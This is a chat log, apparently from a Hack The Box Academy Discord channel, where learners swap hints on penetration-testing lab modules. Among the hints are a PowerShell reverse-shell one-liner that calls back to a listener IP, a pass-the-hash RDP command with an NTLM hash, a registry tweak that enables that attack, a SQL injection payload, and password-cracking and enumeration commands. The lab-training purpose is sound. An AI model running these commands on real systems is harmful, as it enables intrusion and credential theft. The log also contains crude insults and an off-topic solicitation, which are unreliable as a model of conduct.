#modules
since I never had the issue of transferring any file from the pwnbox to my local machine, does the pwnbox go over the internet? Can I use any file hosting transfer service?
I tried wetransfer and another site like that, but the zip file I get is about .2 MB smaller and bloodhound rejects it
did you check the hash before and after the download?
They look the same
This is what I get in bloodhound
The naming convention hasn't been changed, however, the different versions of bloodhound and sharphound can affect this
I used whatever version of bloodhound-python that the pwnbox has to get the zip file...would it work if I tried some other tool to get the zip?
As long as the versions "match" there wouldn't be an issue
Additionally, you can try with https://github.com/szymex73/bloodhound-convert
That worked! You are awesome, @autumn pilot Thank you!
anyone having issues with the xss module? im trying to connect to the phishing targets but i only see them down
nvm got up right after this post
dead
back down ffs
Can someone help with a hint for the question "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. " in Active Directory Lab 2. I know I have to use ||DomainPasswordSpray|| but I only have 1 password ||w****|| and the tool just gives me a hit on my already known user ||A****|| I have enumerated for other passwords and have dumped the ||SQL service hash|| just can't crack it. Is there another cred I was supposed to find? Been stuck for 3 days now....
Did you try the weak common passwords shown in the module?
I haven't. I have been re-reading the module on this part and can't seem to find that. Thanks for the hint, I just can't find this part in the module you have been referencing.
Could you explain it to me?
It's mentioned in multiple places - the intro to password spraying, password spraying from Linux, from Windows
hi
hey
Do You know which command to use?
you can use a simple for loop for that
help me with that.
or something like that (assuming it’s a linux machine)
it's windows cmd
go in the documents folder and try the command tree .
and then look for the flag
i tried that, there are so many dirs and flag.txt
need to get content of all files in one go, is there any cmd?
idk
what type of shell do you have?
power shell?
windows command line
Thank You.
Do you guys also download the cheatsheets from the modules and get a Defender error?
I have the problem that my Windows Defender marks them as a threat:
"Backdoor:PHP/Remoteshell.F"
Is this because Defender reads the file content and finds a suspicious line of code?
Yes it’s always the PHP webshell one liner lol, just make an exception
Yes, you need to add a file/folder exclusion to defender
Thanks!
Hii, would someone please be able to help me with an academy module?
just ask your question, which module, which section, what have you tried
Doing the Windows Event Logs and Finding Evil Module, it asks to find the executable in the Event Viewer in the very first question. I am unable to find it correctly, not sure if I'm doing something wrong but I navigated to the correct event id and time and cannot seem to find the correct executable name
This is a good hint ^
Ahh got it thanks, I messed up and set my filter to only have 4624 events 🙂
Module : Attacking Common Services
Section : Attacking SQL Databases
Question : What is the password for the "mssqlsvc" user?
can someone help me with hashcat, i found the hash of 'mssqlsvc' with responder and used hashcat but it gives me a wrong password
hashcat -m 5600 -a 0 test.hash /usr/share/wordlists/rockyou.txt
with john i cracked it instantly
||princess1|| ?
i can’t make hashcat work most of the time idk
me too its so annoying
need a cracking rig 🤣
never had an issue with hashcat, idk what the problem might be
i think it's with the cpu i cant use it in my parrot machine but i can in my kali i dont know why
you can just use hashcat on your host
Ya do everything except hash cracking from VM, i run a 4080 natively and smash through wordlists w hashcat
do you need cuda toolkit?
i have a 3070Ti
but for everything i have done in this field i have never needed hashcat tho in the next modules you use it
honestly, I don't bother running it on my host for CTFs, since it's meant to crack quickly by design, but if you get any issues, that's a good way to avoid them
also do you build from source?
There’s pre-built binaries
ikik
i think also getting from github code can lead to some errors since its a development branch
does it work out of the box in Windows apart from installing CUDA toolkit?
Yeah
Bro have you been cracking from a vm?
i only had to crack for CTFs and HTB boxes
Dude haha, download hashcat rn and start using it. With a 3070ti the difference is next to none
Even for CTFs
using JtR from my Parrot Vm always has been enough
never took more than 30 seconds
also i have a 5800x maybe that helps 🤣
that thing is hot tho
I have a question for the module Advanced SQL Injections in the section Error-Based SQL Injection.
';SELECT%20CAST(CAST(QUERY_TO_XML('SELECT%20*%20FROM%20USERS%20where%20id%20=%2010',TRUE,TRUE,'')%20AS%20TEXT)%20AS%20INT)--%40bluebird.htb
With that statement i get all the info for the user
How do i get the CODE for the reset?
In this module
https://academy.hackthebox.com/module/67/section/606
What information does crackmapexec provide us?
I don't know how to get the flag. I've not been able to crack the Administrator NTLM hash with either Hashcat or Crackstation. Any suggestions ?
I haven't done the module yet but it doesn't look like you need to crack it, just to follow the section, escalate privileges and read the file
Thanks, even with the elevated privileges, I still can't access the flag
Strange, what if you navigate to it manually via GUI? Or try to cat/type it out
you can try to use takeown or since you are an administrator you can "DCSync" most probably then get the hash of the "local administrator" log in, and get the flag
I get PermissionDenied UnauthorizedAccessException with both Windows Explorer and cat and type in PowerShell.
Hi Guys I am stuck on "Linux Privilege Escalation - Miscellaneous Techniques", I have root privilege but unable to find flag
Can someone please help
The only other option is to pass the hash with xfreerdp
So instead of using a password to log in with xfreerdp I would use the NTLM hash I got from secretsdump.py?
hi i'm doing the crypto challenge secure signing would like to know if it's appropriate to ask if i can dm someone for a hint / if im in the right direction? I have a partial flag and some python code so far. If it's not appropriate thats ok as well 🙂
this channels is for HTB academy modules read #welcome and #rules after that use /verify at #bot-commands and ask that at #challenges
thank you 🙂 haven't verified yet will do now much appreciated
Yeah, make sure to add the appropriate registry key so PtH can work
Thanks, which is the appropriate registry key?
no need to overcomplicate things, even the simplest manoeuvre can make an effect
no hashes, no dumping and etc is necessary
It was taught earlier in modules when discussing PtH attacks, if you're not doing things in order, Google can help
I tried like this:
xfreerdp /v:10.129.43.42 /u:Administrator /pth:||7796ee39fd3a9c3a1844556115ae1a54||
i get
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
try psexec or the above 👆
I get an Access is denied
Is there someone I can DM about the Enumerating ColdFusion section of the Attacking Common Applications module? This is the third day that I have tried loading the target and navigating to port 5500, but I keep getting timeout error messages. I'm hoping someone can help me make progress without having to navigate to <IP>:5500
I ran it from a Command Prompt that had been started with "Run as Administrator:" It says Administrator: Command Prompt at the top.
Is there another way to run the reg add command as admin?
At this point it sounds like there's something wrong with the instance, because as soon as you escalated to local admin, you should be able to access everything
I had a similar problem on the target for the Dns Admins Privilege module. Even though the system said I was administrator I couldn't execute any commands as administrator. I had to get the DNS server to execute a reverse shell for me in order to get the flag.
You are unnecessarily overcomplicating things
Ok, thanks. How do you think I should proceed ? 😀
since you are modifying the access token of the user, a certain action needs to be done that is the simplest thing that a user can do whenever his groups/privs have been changed
Ok, thanks, I'm not sure I understand the relevant security mechanism interactions. What is the certain action that needs to be done?
Haha, so you are saying I need to log out and then log back in 😝 ......Ok let me try........
So for second question in the shells section , when I 'rdp' into the target machine , is there suppose to not be any internet connection?
target vms are not connected to the internet
So the exercise doesn't require an internet connection for the target VM machine?
why would it?
Thanks, that worked. I will definitely add that to my list of mistakes "Not logging out and then back in after executing a Windows Privilege Escalation" 😝
sometimes the simplest action is the key towards the solution
funfact: im currently in a different "Windows Privilege Escalation" section and after successful escalation i couldn't access the file... was about to ask here but read your post, thought "meh, give it a try" and... yes. 😄 thx for your help
is there a feature to get machines based on modules i have completed so far
on the "completed" pages for modules is a list of machines
i mean machines with modules i have completed so far
if i see the ones on completed pages, they require additional modules that i have not completed so its hard
i think they are currently building something in the other direction: on machine info cards there is a "Machine Info" tab where sometimes there is a list of "Related Academy Modules", see https://app.hackthebox.com/machines/Popcorn/information
but i think this requires a ton of classification work - so maybe this is a future feature
Module name : Attacking common Services
Section name : Attacking DNS
Question : Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
i did a subbrute and found 4 subdomains of inlanefreight.htb but i dont know where to go, can someone give me a hint?
Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\
how to do it
I have tried for it so many times
which section, which module? we don't automatically know
msf can't work
do host but it gives nothing
what else
SHELLS & PAYLOADS
Infiltrating Windows
not with a non-existing domain, what else?
module: SHELLS & PAYLOADS name: Infiltrating Windows question: Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\
I can dig zone transfer
the module basically walks you through it
exactly
i tried but i need the ip of the subdomains for that?
and i dont have them
the IP you use in the command is the IP of the machine you spawned
i'm the dumbest of all ahah, thanks i found the flag
anyone able to give me a hand with installing tplmap? I keep running into issues
try python <3.9
i have this in my note for the pwnbox
git clone https://github.com/epinna/tplmap.git;cd tplmap
virtualenv -p python2 tplmap
source tplmap/bin/activate
pip install -r requirements.txt
I tried that, never works
do not use tplmap xd
just checked my install: with these changes in core/plugin.py & checks.py i can use it with python 3.9
Hi , For the question 'Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box. ' of the Reverse shell section of the 'shells and payloads' module(https://academy.hackthebox.com/module/115/section/1106) , I been executing the command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.210',1337); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535 | ForEach-Object { 0 }; while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '; $sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush() }; $client.Close()"' on the Windows target that I RDP'd into.
When I executed the above command, I generated an error. I tried removing extra white spaces found in the syntax of the code, using ChatGPT's suggestion for the error, copying the code into a notepad document before copying it into the clipboard, and I still generate errors. I am now at a loss on how to resolve this error.
that command is run from the command prompt, not from powershell
are you saying that I SHOULD run it from the command prompt or that I am currently running it from Command prompt
nevermind, I tried it
is it working now?
Yes. strange that that powershell command wouldn't work in the powershell prompts
because the command itself starts powershell
if you remove the first part powershell -nop -c along with the quotes surrounding the command, it'll work from powershell
oh okay
read #welcome and #rules after that use /verify at #bot-commands and ask at #boxes
btw i tried using the identify thingy it isnt working
did you try #bot-commands message ?
yeah
but it's giving me an error
ping a mod with the error
okay
Hello folks, anyone managed to finish the File Upload Module ? Stuck in the "Type Filters" section, able to upload file, but no execution.
am i supposed to get this working in the exercise?
or is this just for demonstration?
would like to finish the module today as well as another one since my exam voucher expires tomorrow.
the majority of the time, windows will block ping, so yes, can you scan it is the question?
ok this is not working because i think the path for submitDetails.php is different from /var/www/html, but the question now is: is this an erratum or intended?
i know it is not working for that particular file because i can read the one needed to pass the section
can someone double check?
Hey Guyz, i'm currently doing the
Pivoting, Tunneling, and Port Forwarding
RDP and SOCKS Tunneling with SocksOverRDP
But it asks me to upload a dll to my Windows machine. When i try to do it by RDP, Windows tells me that it's not possible because it might be a virus. I tried to zip it and send it, it works, but when i extract the zip the dll file is deleted after a few seconds
Don't you have to serve some of those lines over HTTP
ill grab my notes up
i did of course
as i said i could solve the exercise
but it's weird because the CDATA method is supposed to show ALL files without exception
and yes the /var/www/html/submitDetails.php is the correct path
works
does not work
what happens if you change it to ./submitdetails.php
it crashes
very weird
im asking for the CDATA method
yeah wasnt sure if it was a box issue or CDATA
it is w.e. maybe the module creator can shed some light
or any web expert around here
i mean check this, in the module instructions it is indeed working
no you have to place the entity defined in the evil.dtd file
just not that one haha
self reference makes sense
its working now?
ah yah the base64 one
its the /error page
working on the module for C# and I have a ridiculous question... I can't figure out the question for the array section as I don't know what it is 'exactly' asking for. This is very hard to ask about without risking a 'spoiler'. The question states: How can you access the element in the third row and second column of a two-dimensional array named grid in C#? Using the example given above in Console.Write(matrix[i, j] + " "); I have tried to mimic the coding convention in the example with the trailing space after the comma and the format shown for the matrix variable. I also tried swapping what I believe to be column and row, removing the trailing space, adding others, etc. I don't know what pattern it is looking for. Maybe the question would be better if it was: Write a line of code to set the variable 'foo' equal to the row m and col n of the array bar using code conventions shown above; answer foo = bar[m, n];
noo the /error
honestly no idea haha
+1
i wont sleep today i think
it seems this is what is happening but this is not documented in the module
i think we need an erratum
both passwd and submitDetails.php contain weird symbols (?)
Hi, I am currently in the network enumeration with nmap module. I was going through the firewall section and I am a bit confused about the DNS proxying part in the example: why are they specifically using port 50000?
Module name : ATTACKING WEB APPLICATIONS WITH FFUF
Section : Sub-domain Fuzzing
is it only me or has the question changed recently
is that a random port or something calculated?
has to be only you
my answer is *.inlanefreight.com
not me
it changed then
that domain does not exist anymore i think
it redirects you to hackthebox.com
old times from hackthebox.eu xD
old and good times
xd ok i thought i was insane for a moment lol
Looking for help finding tools - I am in the HTB academy fundamentals module Documentation and reporting lab. I've already answered question 1 but it seems based on the documentation I will need to use Rubeus/mimikatz to answer the next couple of questions. Can anyone point me in the right direction to find these tools in the lab?
send the link of the section
this is not here i think
we dont have access to enterprise
contact your local instructor
i asked coz we dont even have a "HTB Academy Fundamentals" module
do mods even reply here?
Hello! I am new here, and I am just curious, are the HTB certs the best certs or are there more relevant certs to get for pen testing? (No disrespect, I am just not knowledgeable)
Or what is a good start to getting into it? (Aside from A+, Sec+, Network+)
They don't actively monitor channels, what's your issue?
the identification shit aint workin
For getting a job, no, for getting knowledge, yes
The CPTS path is useful for CPTS
No, anything that's in that path and not in CPTS path is not relevant to the CPTS exam
hey i'm currently on Credentials in Object Properties. I created the script as SearchUser.ps1. i ran the script in powershell and nothing happened. what am i doing wrong, can u assist?
You need to load the script into memory first
cool script to exfil data through XXE out of band
What path are you talking about? I cannot find where to begin
<@&861185840277487616> check his bio
Ty @analog dock
You’re welcome
hi guys i am stuck in footprinting dns last question can anybody help please?? What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Enumerate more
please dm
Subdomains of subdomains
For what?
i am stuck there for 4 hours
I gave you a hint here
ok so a subdomain of inlanefreight.htb
There's really not much else to nudge for
Your answer will be a.b.inlanefreight.htb
sometimes the answer is in front of us and we dont see it
i tried something like this and didnt work
As stated in the hint that's given to you by the module: wordlists often have different words
So start small go bigger when trying different wordlists
i tried top 5000 and fierce
use the fierce wordlist in the dns enum tool
didnt show me the result i need
it may be you’re not querying the right subdomain
^
😉
If you're not finding the answer maybe try something different
You'll need to use dnsenum on the subdomain.inlanefreight.htb
i tried them all this is the problem
^
What does your command look like
dnsenum --dnsserver 10.129.79.194 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/wordlists/seclists/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb
tried also ns.inlanefreight.htb
and others
wordlist110000
5000
Fierce is correct
the domain?
You must have skipped over a subdomain
internal.inlane
You're missing one
app
Your messages are being deleted as they contain spoilers btw
By a mod, not me
Unless you did
no not me
I'm not telling you which one you're missing in your list. Do a simple zone transfer to inlanefreight.htb
And see if you're missing a subdomain you haven't used dnsenum on
you need to. enumerate more
there is a helpful graphic in the section of the module
take the time to understand it
found it
ALL
hello every one, anyone who knows about ligolo-ng?, to ask some related to pivot module
congrats
thank u
was tricky because i did run this command but it made an error so i cancelled; this time after i read the graph i left it to see and it ran, i saw the 1st host and i left it more
LoL @thorn urchin ok., here we go.....
Patience is key in this field
the ligolo-ng fans grow daily
It's not a cult, trust
my double pivot is established, BUT can't ping to what I think is DC01 (172.16.6.25)
yea well i am trying to do the modules for the cpts learning pentesting path so its a little bit different and the notes are amazing
the information is amazing all have to be noted
I'm also doing this path, the module that really tests patience is password attacks
mmm i will check it out and tell u about it 😄
You're basically forced to wait for the tools because you're given a custom wordlist to mutate and run against the targets
almost
why did you start the first session, switch to a second session, then switch back?
you have to be on the session that has access to the subnet you want to target
also dont forget to add the new route for the new subnet
that route is already added...
why you ... me
yea but sometimes u should make it for example run as tail
to start from bottom
I gave two big pointers for why it could be not working
if you insist one of the two big points are fine, then address the other one
I would suggest not lol
both the route and the correctly selected session need to be active at the same time
Currently on the Password attacks\PtT. I've found the hash for the workstations but am having some trouble cracking it. Anyone that can point me in the right direction? Have tried both Hashcat and John without luck
also do you KNOW that the DC is on the IP or just guessing? And have you interacted besides just ping? because most windows machines ignore ping
Use the right wordlist? My notes on that module are a bit shit
Also which pass the ticket: windows or linux
linux
^^
have tried both rockyou and the mutated one based on the resources in the exercises
from Pivot-SRV01 I made a ping sweep and found 172.16.6.25 alive, that's why I'm guessing it's DC01...!!!
if I understood correctly, I select the session thru 172.16.60/24 inet and is not working either
b
Did you also try the tool shown in the section?
can you humor me by issuing the ifconfig command from the pivot session and sharing the results
dont happen to remember what -m you used for AES 256?
I'm referring to the web tool if you scroll up on that section
yeah that didnt work
hmm okay.
try just doing a crackmapexec smb 172.16.6.0/24 sweep
Then you can Google hashcat modes I forget the flag in hashcat to use
Hi, I am currently in the network enumeration with nmap module. I was going through the firewall section and I am a bit confused about the DNS proxying part in the example: why are they specifically using port 50000? I tried running the command
nmap -v -sV -p- -Pn -n --disable-arp-ping --source-port 53 -oX freshTCP.xml 10.129.2.47 but the scan takes more than 5 hours and by the time it finishes the machine expires. Please help I am stuck in the last ips hard box.
Hi, has anyone here solved the sau machine?
another folk gave me a hand, starting the session was what I was missing
you mean that thing I told you to do at the beginning? lol
now I can reach 172.16.6.25
dope
Do -sS
That's literally the only difference
If you take out the given port
I tried that and sA but when I am trying on all the ports it takes an absurdly long time
you mean this -> why did you start the first session, switch to a second session, then switch back?
I did almost all of them
yeah, you gotta be using the correct session
ok., maybe I misunderstood an output, cuz I guess I ran the start command and received an message the session was already started, but maybe I'm wrong, but thank you btw
You don't need the -sV flag
tried without it too
the problem is when I do -p- it takes an absurdly long time like 7 to 8 hrs
and I do not get any result
even when I try -T5
at which point I get blacklisted
I have a good internet conn too
the problem is not only with the last box but all the boxes in that module
you can try dividing the port range into manageable parts (-p1-10)
lol I used the wrong kt file
Used the one referred to in the script... can now see there is one more
facepalm
it still takes a lot of time to do from 1-100 like around 10 mins for a -F scan
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
any metasploit or wordlist to use?
That sounds like a local network issue then if it's being that slow
Local, as in your own internet
I get around 100Mbps here
That's honestly not a whole lot. But it could be that the packets are being filtered by your ISP. But I don't really know, the VPN region shouldn't be the issue
the word list to use was already provided in the module
any idea how can I speed it up?
yes what if i use the pwnbox?
you should try that
Stop your vpn connection on your vm and test in pwnbox
ok I will do that thanks for the help guys
pivot skill assessment is pretty unstable or I'm the only one who is suffering with it...!!!
found nothing
nmap 10.129.79.194 -p25 --script=smtp*
none of them worked; found 10 and used them, didn't work
same as nmap 10.129.79.194 -p25 --script=/usr/share/nmap/scripts/smtp-enum-users.nse
hint: look at the hint
😉
mmm
enum username
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
Eh
it worked thanks again @fathom pendant @lusty thicket
smtp-user-enum script I find is better to use to not have to use Metasploit tbh
any idea how do I import the scan files from pwnbox to my vm?
cuz if I use http server on pwnbox I cannot use the vpn from my vm
try using base64
Need some help from the community, particularly those who are good at assembly code! I'm stuck on the Intro to Assembly language module, I find the module to be extremely complex, and the language quite hard to understand. And I'm only halfway so will likely return here for help....
Currently, I need to modify this code (mov rax, 5) so that it will not loop. I then need to find the hex value that prevents the loop. Here is the code I am to edit:
global _start
section .text
_start:
mov rax, 5 ; change here
imul rax, 5
loop:
cmp rax, 10
jnz loop
i did, it gave me a list, i tried all, nothing worked
Yeah and Metasploit is often a crutch tbh. I honestly avoid msfconsole unless told to use it
I am going in sequence through the cpts path, I will look into the module once i get there
Thanks for the suggestion
did you look at the hint?
employee name

On systems, usernames are often named after the employee's name. We recommend using the Footprinting-wordlist provided as a resource. Remember that some SMTP servers have higher response times.
the part about smtp servers having different response times
mmm
play with the timing a bit
min rate
timing
how
the smtp-user-enum tool works for me
it worked and gave me users
Well with the smtp-user-enum tool doing like -W 15 seems to be the sweet spot
gave me 10 users
10 valid users?
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
nmap 10.129.79.194 --script=smtp-enum-users -p25
just use the smtp-user-enum tool man
Not in nmap
don’t you need to provide a wordlist as a script argument?

Because in Nmap iirc you have to mess with the --script-args={option1,option2,option3,option4}
"Broken Authentication" -> "Predictable reset token" I have done most of the necessary steps to generate tokens but I think my timestamp is messed up. I don't want to spoil others, so possibly anybody able to help me could DM 🙂
rockyou?
Which is far more painful (doable)
Sirg
i didnt see
the wordlist already provided in the resources section
hi. Can someone help me with a hint for Session Hijacking? I am not getting any cookies or cookies.txt. Am I supposed to put my VPN IP address in the index.php? I have tried the target's IP and mine so idk what I am doing wrong.
i didn't know that we can use it from there
Generally you start with that wordlist and move to others if it doesn't work
anybody 🙂 ?
yea sorry didnt know that there is a button there to download first module lol
server hosted in eu
i have to convert time? bruuuuh
Almost every module provides
You can just search "predictable reset token" in the discord search and you'll see the nudges other people got if you click their message
ah ok
Like you can get lucky with it
getting started module, Nibbles Web FootPrinting
Now we are starting to get a better picture of things. We can see some of the technologies in use such as HTML5, jQuery, and PHP. We can also see that the site is running Nibbleblog, which is a free blogging engine built using PHP.
http://10.10.10.75/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.75], RedirectLocation[http://10.10.10.75/nibbleblog/], Title[301 Moved Permanently]
http://10.10.10.75/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.75], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]
am i blind? where is the php ?
oh i get it..
phpsessid
smtp-user-enum -M VRFY -U '/home/kali/Downloads/footprinting-wordlist.txt' -t 10.129.79.194 -p25 -v
Well yes but iirc if you do like -a3 or one of the other flags shown it should give you a broader picture
O.o 0 results
Try change the -W to 15
@fathom pendant Thanks, got the flag now. Also such a useful tip with the past message search, will do that more often before asking here.. Finally I can go to the gym, I thought I would spend the whole evening here xD
Don't recall
look at the help page -h / --help
what is EXPN?
Not needed
i did bro
It can also depend
Some can be set up as blackholes that accept any email/domain and return a positive status
i didnt see the spoil ;p
Like "yes your email did happen, but really it didn't"
Examples:
$ smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
$ smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1
$ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1
i used first one
you need to look at the -h / --help page to see how the options work and the command usage
finally
man everything is okay but idk smtp-user-enum
i used metasploit
Commands aren't always instant, we're forcing it to wait a certain time between attempts
Metasploit is a crutch tbh
you need to try without metasploit
it worked fine when smtp-enum-users didnt
i will try it again
it’s supposed to
debug

You don't need that flag there
it won't change anything
ok trying without
0 result
try timing 30?
try timing 10
honestly I never got smtp-user-enum to work in that section, would be curious to know what would make it work
######## Scan completed at Thu Oct 5 16:20:48 2023 #########
0 results.
i tried 15 i tried 10 i tried 30
i tried 5
crutch better than nothing
😄
Taking breaks usually helps to enhance your understanding and concentration about a problem
Rushing through sections or exercises is something that I do not recommend doing
This is not a sprint, you won't get bonus points for faster solves and etc
probably
check your command syntax
no sprinting, the machine has an error, i already solved it using metasploit
syntax is okay just rebooted the machine to see
works after reboot?
no
syntax is fine i checked cheatsheets and some articles
i changed command many times and nothing worked
everything you need is in the section on SQL databases, have you tried everything?
great
it worked now
man it worked alone -.-
i keep trying and resetting the lab
and removed -p 25 and -v
i use only target and -w 15
I've tried everything I can think of. I've used different ports, used a different name for the file instead of script.js, reset the target multiple times. The index.php isn't getting called. Does anyone know why? I'm in Session Hijacking
I've read through the hackthebox forums, previous discord messages, and googling
did you add it to /etc/hosts
yeah, hopefully that fixes it, I'm pretty sure you could access both http and https
I'm kind of confused about the second question in the footprinting module about mssql because i believe i have listed the non-default database and I assume that I should see some kind of a flag but don't. Any help?
I'm not kidding whatsoever.
also i can't post a picture for some reason
Module name : Getting Started
Section name : Privilege Escalation
with sudo -l got a user2, but cannot get root, tried to upload linpeas.sh with http.server but looks like there is a firewall, how to do it??? please help!!
contact a company that provides those services
This isn't a paid position by me. The government of my country, and maybe even your own may reimburse you later however.
if you know its against the rules then why ask and not just go get bent?
yeah, good luck with that
This is a very serious problem that needs to be properly addressed and immediately.
There is no more time to waste.
nobody cares
discord isnt a great place to hire lmao
Oh people do care. It's people like you that make shit worse for everyone.
something concerning a government totally calls for going to a random server for a learning platform
It's a good place to start. Especially when most others are just ignorant and refuse to accept the facts.
It's just a database name
Ok, and? I have no reason to hide. I have done nothing wrong and am a completely free man.
Shrimply just fuck off
Shrimp? Girl I could pull your mother easily.
You're breaking the rules here so you're doing that wrong
I've probably already done it in fact. 🥱
you're off topic too
lol "shrimply"
She was mid asf.
<@&861185840277487616> can a mod get rid of this spammer already
Some rules are meant to be bent and broken when it comes to stopping very serious criminal organizations.
Nope, there are legit channels to go through, this isn't one of them.
idc
Just go fuck off if you can't comprehend basic rules
keep the channel on topic, seems like that person watched too much CSI: Miami, let him be
Module name : Getting Started
Section name : Privilege Escalation
with sudo -l got a user2, but cannot get root, tried to upload linpeas.sh with http.server but looks like there is a firewall, how to do it??? please help!!
maybe someone will help and not argue in this topic lol??
hey guys is there a reason i can't post my screenshots here?
thx
we'd let him be if he wasn't spamming the channel with his inane bs lol
yes, read and follow #welcome
Check what user2 has access to
thanks
for X amount of time he won't be able to send messages 😉
but how? i cannot upload a linpeas, and for sudo -l there must be a password, that i do not know
you don't need linpeas
Just look around
well ok thanks guys ❤️
feels like a half measure but I guess we will see when his times up
unless discord somehow messes it up
sheesh, I passed the Skills Assessment put cant get the session hijacking section to work
Hint: user2 can see a directory that it probably shouldn't be able to
Pspsps dm
maybe you need to modify iptables to allow access to that port🤷♂️
oh yeah i saw, /root/.ssh and i saw a private key, pasted it on my local machine, chmod 600, and tried to ssh but there is error:root@94.237.53.115: Permission denied (publickey).
did i do something wrong?
did you
thanks, idk why but it finally worked just now
I used port 3333
what's your command?
ssh root@94.237.53.115 -i key
Add the port
oh well thank you very much ❤️ it worked
boi what happened above
Pls fix the xss module 
Guys, would you rather learn by "Starting Machines" on htb and then move to academy
or academy htb -> Starting machines
Cuz those starting machines are also with Guides
thanks i got it
hello guys, in the ad enumeration module Kerberoasting - from Linux i have this question: What powerful local group on the Domain Controller is the SAPService user a member of?
i have the password and a user and i can authenticate to the smb dc
how can i know which group i'm a member of
so, follow the instructions to enumerate
Hi!
i am Doing the living off land module in AD. Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer. i have problem with this question. I managed to list all the disabled users but no flag
can someone give me a sanity check?
my syntax were
i used dsquery
I wouldn't use the object category or object class personally
I'd have to double check if the ldap rights there is correct though
that too, that'd give you a list of users, you'd then need to parse their description
unless you were using ldapsearch instead
and the question was like he need to have admin rights so i added (adminCount=1)
add this
hey guys, quick question: I'm working on the nmap room and doing a vuln scan on the host. do I just pick one of the vulns or should I use searchsploit on the apache server version?
I thought it just me 😦
has anybody had this problem? I rebooted and still not able to click the link. It just started happening out of the blue. I even spawned/clicked the link from windows to copy over the IP address but it just hangs anyway.
Help me too if you solved q3 please
Which section
Just completed my first hack. Pretty cool. I like it.
hey did you solve this? i think that i'm losing my mind. I filtered by 4771, checked all the targetsid and nothing works
Still working on it. Haven’t. Figured it out as yet
section 8
it wants me to find the vulnerable service using the scripts. I checked the hint and it said web server, so I figure the apache server on port 80, and it gave me a huge print out. do I need to just choose one of those vulns?
Try a different browser
thanks, it works in LibreWolf but like what happened to my Firefox? I updated it too.
I’d clear your cache and everything or try in incognito mode
thank you, I totally forgot about that man. The cache!
it works now
Sweet. Good to hear
look at the hint
Section name is more helpful than number for me to look over my notes
Me going through all of Vautia's Modules
Contents are insane and crazy challenging. Thanks you (someone mention him if he is on discord)
i got the answer, if your still interested let me know
how do i paste a screenshot here?
the instructions to verify your account are in the #welcome channel
thanks
ok so im in HyperText Transfer Protocol (HTTP) module in the very first question and the flag is in this file '/download.php' , the target is Target: 94.237.49.11:30792 so the command looks like:
but as you can see in my ls the /download.php file is not there, what am I doing wrong?
i think the command should be like curl -s -o download.php "http://ip:port/path"
Just do wget
how do i know when to use the resources given in the lecture and when to not? i mean i assume when it doesn't work right? but how should a beginner like me know about these commands, like wget is not even listed in the lecture
Do the Information Security Foundations path then
I see, ok that makes sense, i started the bug bounty path and i thought it would start from 0 but i guess not
ok thanks @fathom pendant
Why do you tempt fate by @ a mod?
Can you help me?
Just say what you need help with.
probably related to this #cdsa message
I want to learn how to hack WiFi
Plenty of free resources on that
There is no module about WiFi hacking.
At Offsec there is a course about it
The closest you get is a blue team module on it
Maybe this one
https://www.offsec.com/courses/pen-210/
same
This is about WiFi hacking
https://www.offsec.com/courses/pen-210/
you only need to pay the small price of 800 dollars
Why? Can’t pay for your own?
If it is about the question in which a token for the admin is created within +/-1 second, then you need to create another 2000 tokens.
For every millisecond one token. You can then test this token against the web application.
If it doesn't work, create the next token, and so on.
If you look at the example screenshot and command, you should start there
Also spoilers in image
hmm, does this make sense? Since i'm not really good at coding, especially with math/time, i'm trying to use chatgpt/the script in the module/ || now = int(time())
start_time = now - 2000
fail_text = "Wrong token"||
still dont get it. || Ticket cache: FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB || isn't a ticket file. and the other one belongs to wrong user...
You don't always need a ticket file, read the section carefully
This isn't the place for boxes #1157735501516779711 , to gain access to more of the server read #welcome
Honestly they even made the welcome thing the first thing people see when they join the server and people click through it
sorry man, I'm lost. not sure what you are referring to
The type of file is still a type of ticket file, just not what you're expecting for some reason
hello baby
Kindly go fuck yourself with a cactus
Now() will not work. You need the time which is displayed after clicking the button
The section explains the different types of files you'll work with
Anyone know how can I decrypt the AES encrypted string using this key? https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be
i have string like this edBSHOwhZLTjt/QS9FeJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ.
Key in the link is like this 4E9906E8FCB66CC9FAF49310620FFEE8F496E806CC057990209B09A433B66C1B
AES decryption services tell me that Length of secret key should be 32 for 256 bits key size
